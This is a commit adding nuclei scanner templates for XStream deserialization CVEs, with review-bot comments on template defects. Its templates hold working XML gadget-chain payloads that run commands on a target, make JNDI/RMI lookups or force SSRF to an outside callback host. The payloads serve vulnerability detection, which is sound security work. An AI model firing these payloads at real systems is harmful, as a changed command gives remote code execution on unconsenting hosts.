xstream-ssrf-rce
parent
ed6d6638ca
commit
d1cfaa0a7b
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2013-7285
|
||||
|
||||
info:
|
||||
name: CVE-2013-7285
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.
|
||||
reference:
|
||||
- http://x-stream.github.io/CVE-2013-7285.html
|
||||
tags: cve,cve-2013,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<contact class='dynamic-proxy'>
|
||||
<interface>org.company.model.Contact</interface>
|
||||
<handler class='java.beans.EventHandler'>
|
||||
<target class='java.lang.ProcessBuilder'>
|
||||
<command>
|
||||
<string>nslookup {{interactsh-url}}</string>
|
||||
</command>
|
||||
</target>
|
||||
<action>start</action>
|
||||
</handler>
|
||||
</contact>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
|
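Review bot: The dynamic proxy at L61–L64 binds to `org.company.model.Contact`, which is the illustrative interface from the XStream advisory rather than a class a real target is likely to have on its classpath; if it cannot be loaded, unmarshalling fails before the handler runs and the dns matcher at L102–L111 stays silent, so a negative result here does not indicate a patched XStream. That limitation should at least be stated in the template, e.g. a comment above the `requests:` key: `# NOTE: requires the proxied interface to be loadable on the target; a miss is not proof of a fix`, and the 2021 templates in this commit already show the alternative of proxying a JDK interface (`java.lang.Comparable`, L1737). Separately, `matchers-condition: and` at L96 governs a single matcher and is a no-op, a pattern repeated in every template of this commit.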
@ -0,0 +1,77 @@
|
|||
id: CVE-2020-26217
|
||||
|
||||
info:
|
||||
name: CVE-2020-26217
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.13 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2020-26217.html
|
||||
tags: cve,cve-2020,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString>
|
||||
<flags>0</flags>
|
||||
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
|
||||
<dataHandler>
|
||||
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
|
||||
<contentType>text/plain</contentType>
|
||||
<is class='java.io.SequenceInputStream'>
|
||||
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
|
||||
<iterator class='javax.imageio.spi.FilterIterator'>
|
||||
<iter class='java.util.ArrayList$Itr'>
|
||||
<cursor>0</cursor>
|
||||
<lastRet>-1</lastRet>
|
||||
<expectedModCount>1</expectedModCount>
|
||||
<outer-class>
|
||||
<java.lang.ProcessBuilder>
|
||||
<command>
|
||||
<string>nslookup {{interactsh-url}}</string>
|
||||
</command>
|
||||
</java.lang.ProcessBuilder>
|
||||
</outer-class>
|
||||
</iter>
|
||||
<filter class='javax.imageio.ImageIO$ContainsFilter'>
|
||||
<method>
|
||||
<class>java.lang.ProcessBuilder</class>
|
||||
<name>start</name>
|
||||
<parameter-types/>
|
||||
</method>
|
||||
<name>start</name>
|
||||
</filter>
|
||||
<next/>
|
||||
</iterator>
|
||||
<type>KEYS</type>
|
||||
</e>
|
||||
<in class='java.io.ByteArrayInputStream'>
|
||||
<buf></buf>
|
||||
<pos>0</pos>
|
||||
<mark>0</mark>
|
||||
<count>0</count>
|
||||
</in>
|
||||
</is>
|
||||
<consumed>false</consumed>
|
||||
</dataSource>
|
||||
<transferFlavors/>
|
||||
</dataHandler>
|
||||
<dataLen>0</dataLen>
|
||||
</value>
|
||||
</jdk.nashorn.internal.objects.NativeString>
|
||||
<string>test</string>
|
||||
</entry>
|
||||
</map>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
|
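Review bot: The `description` at L134 is the advisory's affected-version paragraph and says nothing about what the template exercises or how a hit is decided, and the same text with only the version changed recurs at L878, L1434, L1679, L2269 and L2857. A one-sentence summary per template would make triage easier, e.g. `description: XStream up to and including 1.4.13 unmarshals attacker-controlled types from untrusted XML; the template confirms the issue through a DNS callback to interactsh.` The `reference` entries at L33, L1685 and L2275 also use plain `http://` for the same host the other templates reach over `https://`; normalising them avoids an unencrypted first hop when the link is followed.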
@ -0,0 +1,44 @@
|
|||
id: CVE-2020-26258
|
||||
|
||||
info:
|
||||
name: CVE-2020-26258
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2020-26258.html
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258
|
||||
tags: cve,cve-2020,xstream,ssrf
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
Content-Length: 540
|
||||
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString>
|
||||
<flags>0</flags>
|
||||
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
|
||||
<dataHandler>
|
||||
<dataSource class='javax.activation.URLDataSource'>
|
||||
<url>http://{{interactsh-url}}/internal/:</url>
|
||||
</dataSource>
|
||||
<transferFlavors/>
|
||||
</dataHandler>
|
||||
<dataLen>0</dataLen>
|
||||
</value>
|
||||
</jdk.nashorn.internal.objects.NativeString>
|
||||
<string>test</string>
|
||||
</entry>
|
||||
</map>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
|
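Review bot: `Content-Length: 540` at L399 is hard-coded while the body below it contains `{{interactsh-url}}`, whose expanded length differs per run, so the declared length will not match the bytes actually sent; the same applies to `Content-Length: 2799` at L910 and `Content-Length: 1269` at L2301. Unless nuclei is known to recompute the header for these raw requests, the safer form is to omit it, as the other templates in this commit already do (e.g. L157–L163), and let the client set it. The `description` at L364 (and L2711) also reads "server-side forgery request"; the term is server-side request forgery (SSRF), matching the `ssrf` tag at L376.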
@ -0,0 +1,128 @@
|
|||
id: CVE-2021-21344
|
||||
|
||||
info:
|
||||
name: CVE-2021-21344
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2021-21344.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<java.util.PriorityQueue serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<java.util.PriorityQueue>
|
||||
<default>
|
||||
<size>2</size>
|
||||
<comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
|
||||
<indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
|
||||
<packet>
|
||||
<message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
|
||||
<dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
|
||||
<bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
|
||||
<bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
|
||||
<bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
|
||||
<jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>
|
||||
<uriProperties/>
|
||||
<attributeProperties/>
|
||||
<inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
|
||||
<getter>
|
||||
<class>com.sun.rowset.JdbcRowSetImpl</class>
|
||||
<name>getDatabaseMetaData</name>
|
||||
<parameter-types/>
|
||||
</getter>
|
||||
</inheritedAttWildcard>
|
||||
</bi>
|
||||
<tagName/>
|
||||
<context>
|
||||
<marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
|
||||
<outer-class reference='../..'/>
|
||||
</marshallerPool>
|
||||
<nameList>
|
||||
<nsUriCannotBeDefaulted>
|
||||
<boolean>true</boolean>
|
||||
</nsUriCannotBeDefaulted>
|
||||
<namespaceURIs>
|
||||
<string>1</string>
|
||||
</namespaceURIs>
|
||||
<localNames>
|
||||
<string>UTF-8</string>
|
||||
</localNames>
|
||||
</nameList>
|
||||
</context>
|
||||
</bridge>
|
||||
</bridge>
|
||||
<jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
|
||||
<javax.sql.rowset.BaseRowSet>
|
||||
<default>
|
||||
<concurrency>1008</concurrency>
|
||||
<escapeProcessing>true</escapeProcessing>
|
||||
<fetchDir>1000</fetchDir>
|
||||
<fetchSize>0</fetchSize>
|
||||
<isolation>2</isolation>
|
||||
<maxFieldSize>0</maxFieldSize>
|
||||
<maxRows>0</maxRows>
|
||||
<queryTimeout>0</queryTimeout>
|
||||
<readOnly>true</readOnly>
|
||||
<rowSetType>1004</rowSetType>
|
||||
<showDeleted>false</showDeleted>
|
||||
<dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
|
||||
<params/>
|
||||
</default>
|
||||
</javax.sql.rowset.BaseRowSet>
|
||||
<com.sun.rowset.JdbcRowSetImpl>
|
||||
<default>
|
||||
<iMatchColumns>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
<int>-1</int>
|
||||
</iMatchColumns>
|
||||
<strMatchColumns>
|
||||
<string>foo</string>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
<null/>
|
||||
</strMatchColumns>
|
||||
</default>
|
||||
</com.sun.rowset.JdbcRowSetImpl>
|
||||
</jaxbObject>
|
||||
</dataSource>
|
||||
</message>
|
||||
<satellites/>
|
||||
<invocationProperties/>
|
||||
</packet>
|
||||
</indexMap>
|
||||
</comparator>
|
||||
</default>
|
||||
<int>3</int>
|
||||
<string>javax.xml.ws.binding.attachments.inbound</string>
|
||||
<string>javax.xml.ws.binding.attachments.inbound</string>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
|
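Review bot: The JNDI target at L700 is `rmi://localhost:15000/CallRemoteMethod`, so nothing in this payload references `{{interactsh-url}}` and the `interactsh_protocol` dns matcher at L846–L855 has no way to fire; as written the template reports negative against every host. The sibling CVE-2021-21351 template points the same `JdbcRowSetImpl` `dataSource` at the callback host (`rmi://{{interactsh-url}}/test`, L1271), and this one presumably needs the same treatment, `<dataSource>rmi://{{interactsh-url}}/CallRemoteMethod</dataSource>`; the `localhost:15000` value appears to be a leftover from a local lab setup.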
@ -0,0 +1,85 @@
|
|||
id: CVE-2021-21345
|
||||
|
||||
info:
|
||||
name: CVE-2021-21345
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2021-21345.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
Content-Length: 2799
|
||||
|
||||
<java.util.PriorityQueue serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<java.util.PriorityQueue>
|
||||
<default>
|
||||
<size>2</size>
|
||||
<comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
|
||||
<indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
|
||||
<packet>
|
||||
<message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
|
||||
<dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
|
||||
<bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
|
||||
<bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
|
||||
<bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
|
||||
<jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
|
||||
<uriProperties/>
|
||||
<attributeProperties/>
|
||||
<inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
|
||||
<getter>
|
||||
<class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
|
||||
<name>verify</name>
|
||||
<parameter-types/>
|
||||
</getter>
|
||||
</inheritedAttWildcard>
|
||||
</bi>
|
||||
<tagName/>
|
||||
<context>
|
||||
<marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
|
||||
<outer-class reference='../..'/>
|
||||
</marshallerPool>
|
||||
<nameList>
|
||||
<nsUriCannotBeDefaulted>
|
||||
<boolean>true</boolean>
|
||||
</nsUriCannotBeDefaulted>
|
||||
<namespaceURIs>
|
||||
<string>1</string>
|
||||
</namespaceURIs>
|
||||
<localNames>
|
||||
<string>UTF-8</string>
|
||||
</localNames>
|
||||
</nameList>
|
||||
</context>
|
||||
</bridge>
|
||||
</bridge>
|
||||
<jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
|
||||
<activationCmd>nslookup {{interactsh-url}}</activationCmd>
|
||||
</jaxbObject>
|
||||
</dataSource>
|
||||
</message>
|
||||
<satellites/>
|
||||
<invocationProperties/>
|
||||
</packet>
|
||||
</indexMap>
|
||||
</comparator>
|
||||
</default>
|
||||
<int>3</int>
|
||||
<string>javax.xml.ws.binding.attachments.inbound</string>
|
||||
<string>javax.xml.ws.binding.attachments.inbound</string>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
|
@ -0,0 +1,101 @@
|
|||
id: CVE-2021-21351
|
||||
|
||||
info:
|
||||
name: CVE-2021-21351
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: XStream uses a blocklist mechanism when parsing XML text which is utilized to defend against deserialization vulnerabilities, but in 1.4.15 and earlier, blocklists are incomplete and attackers could use javax.naming.ldap.Rdn$RdnEntry and javax.sql.rowset.BaseRowSet to make an JNDI injection and execute arbitrary commands finally.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351
|
||||
- https://x-stream.github.io/CVE-2021-21351.html
|
||||
- https://paper.seebug.org/1543/
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<sorted-set>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>ysomap</type>
|
||||
<value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
|
||||
<m__DTMXRTreeFrag>
|
||||
<m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
|
||||
<m__size>-10086</m__size>
|
||||
<m__mgrDefault>
|
||||
<__overrideDefaultParser>false</__overrideDefaultParser>
|
||||
<m__incremental>false</m__incremental>
|
||||
<m__source__location>false</m__source__location>
|
||||
<m__dtms>
|
||||
<null/>
|
||||
</m__dtms>
|
||||
<m__defaultHandler/>
|
||||
</m__mgrDefault>
|
||||
<m__shouldStripWS>false</m__shouldStripWS>
|
||||
<m__indexing>false</m__indexing>
|
||||
<m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
|
||||
<fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
|
||||
<javax.sql.rowset.BaseRowSet>
|
||||
<default>
|
||||
<concurrency>1008</concurrency>
|
||||
<escapeProcessing>true</escapeProcessing>
|
||||
<fetchDir>1000</fetchDir>
|
||||
<fetchSize>0</fetchSize>
|
||||
<isolation>2</isolation>
|
||||
<maxFieldSize>0</maxFieldSize>
|
||||
<maxRows>0</maxRows>
|
||||
<queryTimeout>0</queryTimeout>
|
||||
<readOnly>true</readOnly>
|
||||
<rowSetType>1004</rowSetType>
|
||||
<showDeleted>false</showDeleted>
|
||||
<dataSource>rmi://{{interactsh-url}}/test</dataSource>
|
||||
<listeners/>
|
||||
<params/>
|
||||
</default>
|
||||
</javax.sql.rowset.BaseRowSet>
|
||||
<com.sun.rowset.JdbcRowSetImpl>
|
||||
<default/>
|
||||
</com.sun.rowset.JdbcRowSetImpl>
|
||||
</fPullParserConfig>
|
||||
<fConfigSetInput>
|
||||
<class>com.sun.rowset.JdbcRowSetImpl</class>
|
||||
<name>setAutoCommit</name>
|
||||
<parameter-types>
|
||||
<class>boolean</class>
|
||||
</parameter-types>
|
||||
</fConfigSetInput>
|
||||
<fConfigParse reference='../fConfigSetInput'/>
|
||||
<fParseInProgress>false</fParseInProgress>
|
||||
</m__incrementalSAXSource>
|
||||
<m__walker>
|
||||
<nextIsRaw>false</nextIsRaw>
|
||||
</m__walker>
|
||||
<m__endDocumentOccured>false</m__endDocumentOccured>
|
||||
<m__idAttributes/>
|
||||
<m__textPendingStart>-1</m__textPendingStart>
|
||||
<m__useSourceLocationProperty>false</m__useSourceLocationProperty>
|
||||
<m__pastFirstElement>false</m__pastFirstElement>
|
||||
</m__dtm>
|
||||
<m__dtmIdentity>1</m__dtmIdentity>
|
||||
</m__DTMXRTreeFrag>
|
||||
<m__dtmRoot>1</m__dtmRoot>
|
||||
<m__allowRelease>false</m__allowRelease>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>ysomap</type>
|
||||
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
|
||||
<m__obj class='string'>test</m__obj>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
</sorted-set>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
|
@ -0,0 +1,82 @@
|
|||
id: CVE-2021-29505
|
||||
|
||||
info:
|
||||
name: CVE-2021-29505
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
|
||||
reference:
|
||||
- https://paper.seebug.org/1543/
|
||||
- https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29505
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<java.util.PriorityQueue serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<java.util.PriorityQueue>
|
||||
<default>
|
||||
<size>2</size>
|
||||
</default>
|
||||
<int>3</int>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>12345</type>
|
||||
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
|
||||
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>12345</type>
|
||||
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
|
||||
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
|
||||
<parsedMessage>true</parsedMessage>
|
||||
<soapVersion>SOAP_11</soapVersion>
|
||||
<bodyParts/>
|
||||
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
|
||||
<attachmentsInitialized>false</attachmentsInitialized>
|
||||
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
|
||||
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
|
||||
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
|
||||
<names>
|
||||
<string>aa</string>
|
||||
<string>aa</string>
|
||||
</names>
|
||||
<ctx>
|
||||
<environment/>
|
||||
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
|
||||
<java.rmi.server.RemoteObject>
|
||||
<string>UnicastRef</string>
|
||||
<string>{{interactsh-url}}</string>
|
||||
<int>1099</int>
|
||||
<long>0</long>
|
||||
<int>0</int>
|
||||
<long>0</long>
|
||||
<short>0</short>
|
||||
<boolean>false</boolean>
|
||||
</java.rmi.server.RemoteObject>
|
||||
</registry>
|
||||
<host>{{interactsh-url}}</host>
|
||||
<port>1099</port>
|
||||
</ctx>
|
||||
</candidates>
|
||||
</aliases>
|
||||
</nullIter>
|
||||
</sm>
|
||||
</message>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
|
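Review bot: The `reference` list at L1437–L1446 cites a third-party writeup, a vulhub README and the MITRE entry but not the upstream XStream advisory that every other template in this commit leads with (the `https://x-stream.github.io/<CVE-ID>.html` form seen at L140, L370, L501 and others). If that page exists for CVE-2021-29505 it belongs first in the list, since it is the vendor's statement of affected and fixed versions and the source the `description` at L1434 is paraphrased from.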
@ -0,0 +1,197 @@
|
|||
id: CVE-2021-39141
|
||||
|
||||
info:
|
||||
name: CVE-2021-39141
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
|
||||
reference:
|
||||
- http://x-stream.github.io/CVE-2021-39141.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<java.util.PriorityQueue serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<java.util.PriorityQueue>
|
||||
<default>
|
||||
<size>2</size>
|
||||
</default>
|
||||
<int>3</int>
|
||||
<dynamic-proxy>
|
||||
<interface>java.lang.Comparable</interface>
|
||||
<handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
|
||||
<owner/>
|
||||
<managedObjectManagerClosed>false</managedObjectManagerClosed>
|
||||
<databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
|
||||
<stubHandlers>
|
||||
<entry>
|
||||
<method>
|
||||
<class>java.lang.Comparable</class>
|
||||
<name>compareTo</name>
|
||||
<parameter-types>
|
||||
<class>java.lang.Object</class>
|
||||
</parameter-types>
|
||||
</method>
|
||||
<com.sun.xml.internal.ws.client.sei.StubHandler>
|
||||
<bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
|
||||
<indices>
|
||||
<int>0</int>
|
||||
</indices>
|
||||
<getters>
|
||||
<com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
|
||||
</getters>
|
||||
<accessors>
|
||||
<com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
|
||||
<val_-isJAXBElement>false</val_-isJAXBElement>
|
||||
<val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
|
||||
<type>int</type>
|
||||
<field>
|
||||
<name>hash</name>
|
||||
<clazz>java.lang.String</clazz>
|
||||
</field>
|
||||
</val_-getter>
|
||||
<val_-isListType>false</val_-isListType>
|
||||
<val_-n>
|
||||
<namespaceURI/>
|
||||
<localPart>hash</localPart>
|
||||
<prefix/>
|
||||
</val_-n>
|
||||
<val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
|
||||
<type>java.lang.String</type>
|
||||
<method>
|
||||
<class>javax.naming.InitialContext</class>
|
||||
<name>doLookup</name>
|
||||
<parameter-types>
|
||||
<class>java.lang.String</class>
|
||||
</parameter-types>
|
||||
</method>
|
||||
</val_-setter>
|
||||
<outer-class>
|
||||
<propertySetters>
|
||||
<entry>
|
||||
<string>serialPersistentFields</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
<type>[Ljava.io.ObjectStreamField;</type>
|
||||
<field>
|
||||
<name>serialPersistentFields</name>
|
||||
<clazz>java.lang.String</clazz>
|
||||
</field>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>CASE_INSENSITIVE_ORDER</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
<type>java.util.Comparator</type>
|
||||
<field>
|
||||
<name>CASE_INSENSITIVE_ORDER</name>
|
||||
<clazz>java.lang.String</clazz>
|
||||
</field>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>serialVersionUID</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
<type>long</type>
|
||||
<field>
|
||||
<name>serialVersionUID</name>
|
||||
<clazz>java.lang.String</clazz>
|
||||
</field>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>value</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
<type>[C</type>
|
||||
<field>
|
||||
<name>value</name>
|
||||
<clazz>java.lang.String</clazz>
|
||||
</field>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>hash</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
<type>int</type>
|
||||
<field reference='../../../../../val_-getter/field'/>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
||||
</entry>
|
||||
</propertySetters>
|
||||
<propertyGetters>
|
||||
<entry>
|
||||
<string>serialPersistentFields</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
<type>[Ljava.io.ObjectStreamField;</type>
|
||||
<field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>CASE_INSENSITIVE_ORDER</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
<type>java.util.Comparator</type>
|
||||
<field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>serialVersionUID</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
<type>long</type>
|
||||
<field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>value</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
<type>[C</type>
|
||||
<field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
||||
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
||||
</entry>
|
||||
<entry>
|
||||
<string>hash</string>
|
||||
<com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
|
||||
</entry>
|
||||
</propertyGetters>
|
||||
<elementLocalNameCollision>false</elementLocalNameCollision>
|
||||
<contentClass>java.lang.String</contentClass>
|
||||
<elementDeclaredTypes/>
|
||||
</outer-class>
|
||||
</com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
|
||||
</accessors>
|
||||
<wrapper>java.lang.Object</wrapper>
|
||||
<bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
|
||||
<dynamicWrapper>false</dynamicWrapper>
|
||||
</bodyBuilder>
|
